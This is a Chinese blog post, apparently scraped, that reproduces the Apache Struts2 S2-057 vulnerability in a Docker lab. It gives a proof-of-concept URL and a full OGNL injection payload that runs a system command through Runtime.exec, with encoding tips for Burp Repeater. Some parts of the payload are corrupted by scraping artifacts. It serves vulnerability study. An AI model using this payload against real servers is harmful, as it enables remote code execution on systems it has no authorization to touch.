2. 程式人生 > 其它 >apache Struts2 s2-057復現

apache Struts2 s2-057復現

阿新 發佈:2021-07-07

今天挖洞時遇見了個Struts2的漏洞,利用時才發現沒工具,決定復現一下,寫一下利用指令碼

docker搭建

訪問8080埠,進去是空白的

然後按照poc訪問,主頁是這樣的

驗證poc:http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

中間的$%7B233*233%7D是${(233*233)}經過url編碼後的樣子

這個驗證要用*,不要用+,容易當成空格

成功執行

在Location那一欄回顯了計算結果

然後使用exp:

${ (#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

這個也要進行url編碼

不要用burpsuite自帶的,不然會把所有字母都進行編碼

替換中間的${(233*233)}

然後repeater執行

工具稍後再寫。。。

相關推薦

apache Struts2 s2-057復現

今天挖洞時遇見了個Struts2的漏洞,利用時才發現沒工具,決定復現一下,寫一下利用指令碼

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =

[struts2]s2-013 漏洞復現

[struts2]s2-013 環境搭建 github buuctf poc Struts2 標籤中 <s:a> 和 <s:url> 都包含一個 includeParams 屬性,其值可設定為 none,get 或 all,參考官方其對應意義如下:

Struts2 S2-061(CVE-2020-17530)漏洞復現

0x00 漏洞簡介Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注

Struts2 S2-061漏洞復現(CVE-2020-17530)

0x01 漏洞描述 Struts2 會對某些標籤屬性(比如 `id`,其他屬性有待尋找) 的屬性值進行二次表示式解析,因此當這些標籤屬性中使用了 `%{x}` 且 `x` 的值使用者可控時,使用者再傳入一個 `%{payload}` 即可造成OGNL表示

(CVE-2020-17530)Struts2 S2-061漏洞復現

0x01 前言 Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注入漏

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現 0x00 漏洞介紹 Struts2框架是一個用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構。它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。Stru

Apache Struts2遠端程式碼執行漏洞(S2-015)

Apache Struts2遠端程式碼執行漏洞(S2-015)介紹 Apache Struts 2是用於開發JavaEE Web應用程式的開源Web應用框架。Apache Struts 2.0.0至2.3.14.2版本中存在遠端命令執行漏洞。遠端攻擊者可藉助帶有‘${}’和‘%{}’

漏洞預警 | Apache Struts2 曝任意程式碼執行漏洞 (S2-045,CVE-2017-5638)

FreeBuf上次曝Struts 2的漏洞已經是半年多以前的事情了。 這次的漏洞又是個RCE遠端程式碼執行漏洞。簡單來說,基於Jakarta Multipart解析器進行檔案上傳時,利用漏洞可進行遠端程式碼執行。該漏洞由安恆資訊Nike Zhe

[struts2]s2-001

[struts2]s2-001 環境搭建 Github buuctf poc 該漏洞因為使用者提交表單資料並且驗證失敗時,後端會將使用者之前提交的引數值使用 OGNL 表示式 %{value} 進行解析,然後重新填充到對應的表單資料中。例如註冊或登入

Struts2 s2-061 Poc分析

簡介 Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注入漏洞

s2-059復現

s2-059 Struts2介紹 是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作為控制器(Controller)來建立模型與檢視的資料互動。Struts 2是Struts的下一代產品,是在 struts 1和

vulhub-struts2-s2-007

0x00 漏洞原理   當配置了驗證規則 <ActionName>-validation.xml 時,若型別驗證轉換出錯,後端預設會將使用者提交的表單值通過字串拼接,然後執行一次 OGNL 表示式解析並返回。例如這裡有一個 UserAction:

CVE-2012-0391 S2-008復現

0X00-引言 蝴蝶死在路上,雲邊藏著念想。有些人刻苦銘心,沒幾年會遺忘。有些人不論生死,都陪在身旁。---張嘉佳《劉十三》

CVE-2011-3923 S2-009復現

0X00-引言 學爪哇去了,看不懂原始碼太難受了,一直在門外晃,不懂原理,構造不出EXP

CVE-2012-0838 S2-007復現

0X00-引言 道可道,非常道。名可名,非常名。 0X01-環境搭建 靶機:CentOS Linux 7 攻擊機:windows server 2016 && Kail

apache-log4j2-rce漏洞復現

  最近最熱門的無非是最近爆出的超大boss—Apache log4j2元件的rce漏洞。安全圈俗稱\'過年\',漏洞影響範圍之廣,危害之大堪比當年的永恆之藍。由於最近爆出,危害程度目前還正在不斷擴大中。超多的大佬已經復現

Apache log4j2-RCE 漏洞復現(CVE-2021-44228)

Apache log4j2-RCE 漏洞復現 0x01 漏洞簡介 Apache Log4j2是一個基於Java的日誌記錄工具。由於Apache Log4j2某些功能存在遞迴解析功能,攻擊者可直接構造惡意請求,觸發遠端程式碼執行漏洞。漏洞利用無需特殊配置,

S2-001復現分析

一、漏洞資訊 漏洞資訊頁面: S2-001 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞型別:

S2-007復現分析

一、漏洞資訊 漏洞資訊頁面: S2-007 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞型別: